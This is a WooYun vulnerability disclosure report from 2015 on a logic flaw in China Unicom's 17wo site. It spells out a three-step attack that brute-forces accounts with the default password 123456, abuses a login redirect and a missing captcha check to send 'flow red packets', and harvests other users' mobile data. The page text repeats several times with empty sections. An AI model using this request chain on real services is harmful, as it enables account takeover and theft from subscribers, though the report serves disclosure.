中国联通17wo设计缺陷可批量自动化盗取他人流量（三个请求轻松搞定）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153639

漏洞标题：中国联通17wo设计缺陷可批量自动化盗取他人流量（三个请求轻松搞定）

漏洞作者：北京方便面

提交时间：2015-11-11 18:46

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：细节已通知厂商并且等待厂商处理中
2015-11-23：厂商已经确认，细节仅向厂商公开
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

中国联通17wo设计缺陷可批量自动化盗取他人流量（三个请求轻松搞定）

详细说明：

17wo可以向他人发送流量红包
【随机派发】那里前面验证了验证码，但是在最后一步却没验证，可以构造数据直接提交（需要登陆）。

http://**.**.**.**/FlowRedPacket!sendFlowRedPacket.action
data：packetAmount=1&sendFlowValue=1&mobile=18600815823&captcha_sj=123456

sendFlowValue为赠送流量数，单位M。
mobile=填写目标手机号
然后发现用户注册后密码默认为：123456，可以批量爆破。
经过测试构造可以构造两个请求达到批量盗取流量的效果：
第一步：

http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket.action&password=123456&chk=&loginType=0&chkType=on

可以利用burp直接爆破并利用backurl跳转获取当前手机号流量

第二步：

http://**.**.**.**/Login!process.action?mobile=18600815823&backurl=FlowRedPacket!sendFlowRedPacket.action?packetAmount%3d1%26sendFlowValue%3d1%26mobile%3d18600827452%26captcha_sj%3d123456&password=123456&chk=&loginType=0&chkType=on

burp将第一步获取到的有流量的手机号作为第二步的目标手机号，将第一步获取到的流量值作为红包流量值（sendFlowValue）并抓取红包链接（例如：http://t.**.**.**.**/cu0afe），还是利用到了backurl

第三步：
带着你自己手机号登陆后的cookie批量去访问红包链接。

http://t.**.**.**.**/xCT7dh
http://t.**.**.**.**/qHDsvb
http://t.**.**.**.**/dj7Z2m
http://t.**.**.**.**/bxByy0
http://t.**.**.**.**/ZELNPs
http://t.**.**.**.**/Uo1PKS
http://t.**.**.**.**/QFHJqP
http://t.**.**.**.**/QCwmof
http://t.**.**.**.**/Q5BGfA
http://t.**.**.**.**/Q0QwZd
http://t.**.**.**.**/Pcl18r
http://t.**.**.**.**/NC2RVd
http://t.**.**.**.**/KNxPLW
http://t.**.**.**.**/KLUVwD
http://t.**.**.**.**/HekWzz
http://t.**.**.**.**/G0Qjqc
http://t.**.**.**.**/9OV0Mw
http://t.**.**.**.**/83RNLi
http://t.**.**.**.**/5XV5vT
http://t.**.**.**.**/2F8kqZ

自动化访问就不演示了，这里我们访问一个测试下：

漏洞证明：

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-11-23 10:47

厂商回复：

CNVD未直接复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153639

漏洞标题：中国联通17wo设计缺陷可批量自动化盗取他人流量（三个请求轻松搞定）

相关厂商：中国联通

漏洞作者：北京方便面

提交时间：2015-11-11 18:46

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153639

漏洞标题：中国联通17wo设计缺陷可批量自动化盗取他人流量（三个请求轻松搞定）

相关厂商：中国联通

漏洞作者： 北京方便面

提交时间：2015-11-11 18:46

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0153639"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：北京方便面

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源北京方便面@乌云